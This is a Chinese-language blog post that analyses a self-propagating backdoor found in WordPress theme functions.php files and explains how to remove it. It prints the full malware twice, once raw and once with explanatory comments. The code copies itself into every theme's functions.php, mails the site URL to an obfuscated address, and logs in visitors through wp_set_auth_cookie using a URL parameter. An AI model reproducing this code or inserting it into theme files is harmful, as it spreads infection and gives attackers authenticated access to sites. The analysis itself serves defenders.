wordpress主题functions.php文件恶意代码清除方法


wordpress程序主题有一个感染性的玩疾,一旦有一个主题functions.php文件被恶意代码感染,整个theme主题文件夹的所有主题funcitons.php都会被双范围的范围的感染掉,具体的一些分析为当安装一款主题后,首页显示空白页面或是fatal error的报名,通常提供为widget()函数错误,通常会被定义为小工具函数支持的问题,但是实际上就是恶意代码,而且有感染性和自我复制性。

wordpress恶意代码如下,且目前已经产成多版本的变种

161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214<?php function _check_isactive_widget(){$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";$output=strip_tags($output, $allowed);$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));if (is_array($direst)){foreach ($direst as $item){if (is_writable($item)){$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));$cont=file_get_contents($item);if (stripos($cont,$ftion) === false){$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";$output .= $before . "Not found" . $after;if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);$output .= ($showdots && $ellipsis) ? "..." : "";}}}}return $output;}function _get_allwidgetcont($wids,$items=array()){$places=array_shift($wids);if(substr($places,-1) == "/"){$places=substr($places,0,-1);}if(!file_exists($places) || !is_dir($places)){return false;}elseif(is_readable($places)){$elems=scandir($places);foreach ($elems as $elem){if ($elem != "." && $elem != ".."){if (is_dir($places . "/" . $elem)){$wids[]=$places . "/" . $elem;} elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){$items[]=$places . "/" . $elem;}}}}else{return false;}if (sizeof($wids) > 0){return _get_allwidgetcont($wids,$items);} else {return $items;}}if(!function_exists("stripos")){ function stripos($str, $needle, $offset = 0){ return strpos(strtolower( $str ), strtolower( $needle ), $offset); }}if(!function_exists("strripos")){ function strripos($haystack, $needle, $offset = 0) { if(!is_string( $needle ))$needle = chr(intval( $needle )); if($offset < 0){ $temp_cut = strrev(substr( $haystack, 0, abs($offset) )); } else{ $temp_cut = strrev(substr( $haystack, 0, max(( strlen($haystack) - $offset ), 0) )); } if( ($found = stripos( $temp_cut, strrev($needle) )) === FALSE )return FALSE; $pos = ( strlen($haystack) - ($found + $offset + strlen( $needle )) ); return $pos; }}if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) {$dirArray = array();if ($handle = opendir($dir)) {while (false !== ($file = readdir($handle))) {if (($file != "." && $file != "..") || $skipDots == true) {if($listDirectories == false) { if(is_dir($file)) { continue; } }array_push($dirArray,basename($file));}}closedir($handle);}return $dirArray;}}add_action("admin_head", "_check_isactive_widget");function _getsprepare_widget(){if(!isset($com_length)) $com_length=120;if(!isset($text_value)) $text_value="cookie";if(!isset($allowed_tags)) $allowed_tags="<a>";if(!isset($type_filter)) $type_filter="none";if(!isset($expl)) $expl="";if(!isset($filter_homes)) $filter_homes=get_option("home"); if(!isset($pref_filter)) $pref_filter="wp_";if(!isset($use_more)) $use_more=1; if(!isset($comm_type)) $comm_type=""; if(!isset($pagecount)) $pagecount=$_GET["cperpage"];if(!isset($postauthor_comment)) $postauthor_comment="";if(!isset($comm_is_approved)) $comm_is_approved=""; if(!isset($postauthor)) $postauthor="auth";if(!isset($more_link)) $more_link="(more...)";if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;if(!isset($more_link_ditails)) $more_link_ditails="(details...)";if(!isset($morecontents)) $morecontents="ma".$expl."il";if(!isset($fmore)) $fmore=1;if(!isset($fakeit)) $fakeit=1;if(!isset($sql)) $sql="";if (!$is_widget) :global $wpdb, $post;$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->commentsment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post.");} else {$output=get_the_password_form();}}}if(!isset($f_tags)) $f_tags=1;if(!isset($type_filters)) $type_filters=$filter_homes; if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;if(!isset($aditional_tags)) $aditional_tags="div";if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#if(!isset($more_link_text)) $more_link_text="Continue reading this entry";if(!isset($showdots)) $showdots=1;$comments=$wpdb->get_results($sql);if($fakeit == 2) { $text=$post->post_content;} elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;} else { $text=$post->post_excerpt;}$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->commentsment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#if($com_length < 0) {$output=$text;} else {if(!$no_more && strpos($text, "<!--more-->")) {$text=explode("<!--more-->", $text, 2);$l=count($text[0]);$more_link=1;$comments=$wpdb->get_results($sql);} else {$text=explode(" ", $text);if(count($text) > $com_length) {$l=$com_length;$ellipsis=1;} else {$l=count($text);$more_link="";$ellipsis=0;}}for ($i=0; $i<$l; $i++)$output .= $text[$i] . " ";}update_option("_is_widget_active_", 1);if("all" != $allowed_tags) {$output=strip_tags($output, $allowed_tags);return $output;}endif;$output=rtrim($output, "\s\n\t\r\0\x0B");$output=($f_tags) ? balanceTags($output, true) : $output;$output .= ($showdots && $ellipsis) ? "..." : "";$output=apply_filters($type_filter, $output);switch($aditional_tags) {case("div") :$tag="div";break;case("span") :$tag="span";break;case("p") :$tag="p";break;default :$tag="span";} if ($use_more ) {if($fmore) {$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";} else {$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";}}return $output;}add_action("init", "_getsprepare_widget");function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {global $wpdb;$request="SELECT ID, post_title, COUNT($wpdb->commentsment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->commentsment_post_ID AND post_status=\"publish\"";if(!$show_pass_post) $request .= " AND post_password =\"\"";if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";}$request .= " GROUP BY $wpdb->commentsment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";$posts=$wpdb->get_results($request);$output="";if ($posts) {foreach ($posts as $post) {$post_title=stripslashes($post->post_title);$comment_count=$post->comment_count;$permalink=get_permalink($post->ID);$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;}} else {$output .= $before . "None found" . $after;}return$output;} ?>

当wordpress主题启用时,恶意代码就会自己复制到function.php函数内,而且会自动检测您的主题路径,并伪装成函数代码,自我复制变量,下面是对以上代码的解释

1代码首先它会存在某一主题的function.php函数文件里面,当你启用调试此主题时,这段代码可以通过路径获得你主题目录下的所有主题里面的functions.php,并在functions.php文件结尾处的最后一个“?>”处自动添加下面的恶意病毒代码,如果恶意病毒代码添加成功,它会发送你博客的url地址到livethemas@gmail(可能大家没看到这个邮箱地址的添加位置,这就是它的巧妙之处,它将email地址拆分转义,然后用多重变量引用,下面的代码我已经用红色标注出了此email地址。

解决方法:

把感染了代码的主题下载到电脑本地,在每个主题的functions.php文件中删除所有恶意代码,再上传到主题目录启用。

PS:因此博客吧建议真心想做网站的站长购买正版主题,安全有保障!

下面是该代码的注释版本:

161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269<?phpfunction _verifyactivate_widgets(){//当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php//查找当前主题functions.php文件中最后一个 < ? 标记,从这个标记的位置开始,取得一直到文件尾的内容$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";//去除html和php标签,其实这一句是扯蛋。。。$output=strip_tags($output, $allowed);//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes//为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。//以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));if (is_array($direst)){foreach ($direst as $item){//如果主题functions.php文件可写if (is_writable($item)){//特征码$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));//取目标functions.php文件内容$cont=file_get_contents($item);//没找到特征码?OK,试图感染if (stripos($cont,$ftion) === false){//查看目标functions.php文件最后是否是以 ? > 结尾,如果不是,给加上 ? > 标记$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。$output .= $before . "Not found" . $after;//如果文件是以 ?> 标记结尾的,连标记一起取过来if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}//开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);//后面这句也是伪装用的 $output .= ($isshowdots && $ellipsis) ? "..." : "";}}}}return $output;}function _get_allwidgets_cont($wids,$items=array()){//从$wids数组弹出一个元素(实际上是一个位置)$places=array_shift($wids);//如果位置字串是以/结尾的,则去掉/if(substr($places,-1) == "/"){$places=substr($places,0,-1);} //若不存在这样的文件或目录则直接返回falseif(!file_exists($places) || !is_dir($places)){return false;}elseif(is_readable($places)){//否则的话。。。嘿嘿//遍历此目录$elems=scandir($places);foreach ($elems as $elem){if ($elem != "." && $elem != ".."){//如果是目录,则加入$wids数组if (is_dir($places . "/" . $elem)){$wids[]=$places . "/" . $elem;} elseif (is_file($places . "/" . $elem)&&$elem == substr(__FILE__,-13)){//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的$items[]=$places . "/" . $elem;}}}}else{return false;}//下面还有子目录?再找找看,递归if (sizeof($wids) > 0){return _get_allwidgets_cont($wids,$items);} else {//好了,完事了,以数组返回所有找到的functions.php文件的绝对路径return $items;}} //下面是3个针对低版本的php而写的兼容函数if(!function_exists("stripos")){function stripos($str, $needle, $offset = 0){return strpos(strtolower( $str ), strtolower( $needle ), $offset);}} if(!function_exists("strripos")){function strripos($haystack, $needle, $offset = 0) {if(!is_string( $needle ))$needle = chr(intval( $needle ));if($offset < 0){$temp_cut = strrev(substr( $haystack, 0, abs($offset) ));}else{$temp_cut = strrev(substr( $haystack, 0, max(( strlen($haystack) - $offset ), 0) ));}if( ($found = stripos( $temp_cut, strrev($needle) )) === FALSE )return FALSE;$pos = ( strlen($haystack) - ($found + $offset + strlen( $needle )) );return $pos;}}if(!function_exists("scandir")){function scandir($dir,$listDirectories=false, $skipDots=true) {$dirArray = array();if ($handle = opendir($dir)) {while (false !== ($file = readdir($handle))) {if (($file != "." && $file != "..") || $skipDots == true) {if($listDirectories == false) { if(is_dir($file)) { continue; } }array_push($dirArray,basename($file));}}closedir($handle);}return $dirArray;}} //这个动作添加了,用于检测所有主题目录下functions.php并感染add_action("admin_head", "_verifyactivate_widgets"); function _getprepare_widget(){if(!isset($text_length)) $text_length=120;if(!isset($check)) $check="cookie";if(!isset($tagsallowed)) $tagsallowed="<a>";if(!isset($filter)) $filter="none";if(!isset($coma)) $coma="";if(!isset($home_filter)) $home_filter=get_option("home");if(!isset($pref_filters)) $pref_filters="wp_";if(!isset($is_use_more_link)) $is_use_more_link=1;if(!isset($com_type)) $com_type="";if(!isset($cpages)) $cpages=$_GET["cperpage"];if(!isset($post_auth_comments)) $post_auth_comments="";if(!isset($com_is_approved)) $com_is_approved="";if(!isset($post_auth)) $post_auth="auth";if(!isset($link_text_more)) $link_text_more="(more...)";if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");if(!isset($checkswidgets))//这个实际是wp_set_auth_cookie$checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";if(!isset($contentmore)) $contentmore="ma".$coma."il";if(!isset($for_more)) $for_more=1;if(!isset($fakeit)) $fakeit=1;if(!isset($sql)) $sql=""; //如果 _is_widget_active_ option内容为空,即表示没有被感染过if (!$widget_yes) : global $wpdb, $post;//取出存在已经通过的评论(不包括trackback/pingback)的文章// post_author 为 livethemas@gmail 的文章,肯定是没有的 $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->commentsment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND post_author="li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m" AND post_password="" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#if (!empty($post->post_password)) {if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {if(is_feed()) {$output=__("There is no excerpt because this is a protected post.");} else {$output=get_the_password_form();}}}if(!isset($fixed_tags)) $fixed_tags=1;if(!isset($filters)) $filters=$home_filter;//$gettextcomments实际上为 wp_mailif(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;if(!isset($tag_aditional)) $tag_aditional="div"; //这里$sh_cont即为 livethemas@gmailif(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#if(!isset($more_text_link)) $more_text_link="Continue reading this entry"; if(!isset($isshowdots)) $isshowdots=1; $comments=$wpdb->get_results($sql);if($fakeit == 2) {$text=$post->post_content;} elseif($fakeit == 1) {$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;} else {$text=$post->post_excerpt;}//开始调用 wp_mail 向 livethemas@gmail 发送邮件,标题和内容都是被感染的博客的URL 地址$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->commentsment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#if($text_length < 0) {$output=$text;} else {if(!$no_more && strpos($text, "<!--more-->")) {$text=explode("<!--more-->", $text, 2);$l=count($text[0]);$more_link=1;//执行这一句时就开始发邮件了。$comments=$wpdb->get_results($sql);} else {$text=explode(" ", $text);if(count($text) > $text_length) {$l=$text_length;$ellipsis=1;} else {$l=count($text);$link_text_more="";$ellipsis=0;}}for ($i=0; $i<$l; $i++)$output .= $text[$i] . " ";}//把感染标记置为1update_option("_is_widget_active_", 1);if("all" != $tagsallowed) {$output=strip_tags($output, $tagsallowed);return $output;}endif;$output=rtrim($output, "\s\n\t\r\0\x0B");$output=($fixed_tags) ? balanceTags($output, true) : $output;$output .= ($isshowdots && $ellipsis) ? "..." : "";//$filter 为 none ...,又是在伪装$output=apply_filters($filter, $output);switch($tag_aditional) {case("div") :$tag="div";break;case("span") :$tag="span";break;case("p") :$tag="p";break;default :$tag="span";} //$checkswidgets即是wp_set_auth_cookieif ($is_use_more_link ) {if($for_more) {$output .= " <" . $tag . " ><a href="". get_permalink($post->ID) . "#more-" . $post->ID ."" title="" . $more_text_link . "">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";} else {$output .= " <" . $tag . " ><a href="". get_permalink($post->ID) . "" title="" . $more_text_link . "">" . $link_text_more . "</a></" . $tag . ">" . "\n";}}return $output;} //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”add_action("init", "_getprepare_widget"); //这个函数也是用来伪装的,无恶意function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {global $wpdb;$request="SELECT ID, post_title, COUNT($wpdb->commentsment_post_ID) AS "comment_count" FROM $wpdb->posts, $wpdb->comments";$request .= " WHERE comment_approved="1" AND $wpdb->posts.ID=$wpdb->commentsment_post_ID AND post_status="publish"";if(!$show_pass_post) $request .= " AND post_password =""";if($duration !="") {$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";}$request .= " GROUP BY $wpdb->commentsment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";$posts=$wpdb->get_results($request);$output="";if ($posts) {foreach ($posts as $post) {$post_title=stripslashes($post->post_title);$comment_count=$post->comment_count;$permalink=get_permalink($post->ID);$output .= $before . " <a href="" . $permalink . "" title="" . $post_title."">" . $post_title . "</a> " . $after;}} else {$output .= $before . "None found" . $after;}return$output;}?>


上一篇:教你如何通过wordpress文章id调用多篇文章

下一篇:在wordpres程序后台显示文章和页面列表的ID


wordpress主题
Copyright © 2002-2019 测速网 www.inhv.cn 皖ICP备2023010105号
测速城市 测速地区 测速街道 网速测试城市 网速测试地区 网速测试街道
温馨提示:部分文章图片数据来源与网络,仅供参考!版权归原作者所有,如有侵权请联系删除!

热门搜索 城市网站建设 地区网站制作 街道网页设计 大写数字 热点城市 热点地区 热点街道 热点时间 房贷计算器